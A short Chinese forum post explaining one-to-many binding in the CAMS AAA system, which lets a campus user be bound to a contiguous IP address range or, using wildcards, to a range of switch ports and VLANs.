  2、一对多绑定

  1)IP地址一对多绑定

  用户可以绑定不只一个IP地址,而是可以绑定一个连续的地址段。这个功能主要应用于校园网中,一个教研室一般都会分配一个连续的地址段,教研室的每个用户都可以自由使用该地址段中的任何一个IP地址。教研室内部的网络结构和IP地址经常变化,将用户和教研室的整个地址段绑定后,可以由各教研室自己分配和管理内部IP地址,既不会因教研室内部IP地址分配问题影响整个校园网的正常运转,又可以大大减少AAA系统管理员的工作量。

  2)端口一对多绑定

  与IP地址一对多绑定类似,也存在端口一对多绑定的问题。CAMS将端口信息分成以下几个部分:接入设备IP地址-槽号-子槽号-端口号-VLAN ID,这几个部分按照范围由广到窄的顺序。任何一个部分都可以使用通配符,表示不限制具体数值。比如,端口号部分输入通配符,就表示将用户绑定在某台交换机下的某个槽号的某个子槽号的所有端口上,可以从其中的任何一个端口接入。
« 返回列表
发帖 回复